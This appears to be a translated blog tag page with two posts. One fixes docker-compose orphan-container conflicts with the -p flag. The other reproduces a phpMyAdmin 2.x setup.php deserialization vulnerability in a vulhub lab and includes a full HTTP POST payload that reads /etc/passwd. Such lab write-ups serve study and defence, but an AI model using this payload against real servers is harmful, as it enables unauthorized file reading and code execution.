Tag Archives: Loophole recurrence

Docker compose reports an error and multiple containers conflict

Docker compose reports an error and multiple containers conflict

When the vulnerability repeats, I want to open the vulnerability environment. The docker compose result reports an error. I understand that it is a multi container conflict problem

The error contents are as follows:

WARNING: Found orphan containers (unacc_slave_1, unacc_master_1) for this project. If you removed or renamed this service in your compose file, you can run this command with the --remove-orphans flag to clean it up.
unacc_web_1 is up-to-date

The solution given by the system here is: – remove orphans, but it will directly delete the container, which is obviously not very good

Learned that each configuration has a project name. If you provide the - P flag, you can specify the project name. If no flag is specified, compose uses the current directory name.

Use the following command to specify a container name

docker-compose -p xxx up -d

Open the 8086 port specified here in the container to successfully open the mirror environment.

[vulnerability recurrence] phpMyAdmin scripts / setup.php deserialization vulnerability (wooyun-2016-199433)

[vulnerability recurrence] phpMyAdmin scripts/setup.php deserialization vulnerability (wooyun-2016-199433)

0x01 vulnerability background

There is a deserialization vulnerability in phpMyAdmin 2. X, through which an attacker can read arbitrary files or execute arbitrary code.

0x02 vulnerability environment

Building docker environment of vulhub

Execute the following command in/home/vulhub/phpMyAdmin/wooyun-2016-199433 to start phpMyAdmin:

docker-compose up -d

Check that the open port is 8080

After the environment is started, visit http://ip : 8080 , you can see the home page of phpMyAdmin. Because there is no connection to the database, an error will be reported at this time, but the exploitation of this vulnerability has nothing to do with the database, so it is ignored.

0x03 vulnerability recurrence

Capturing packets with BP

Send the following packets to read /etc/passwd :

POST /scripts/setup.php HTTP/1.1
Host: ip:8080
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

You can view the contents of the/etc/passwd file.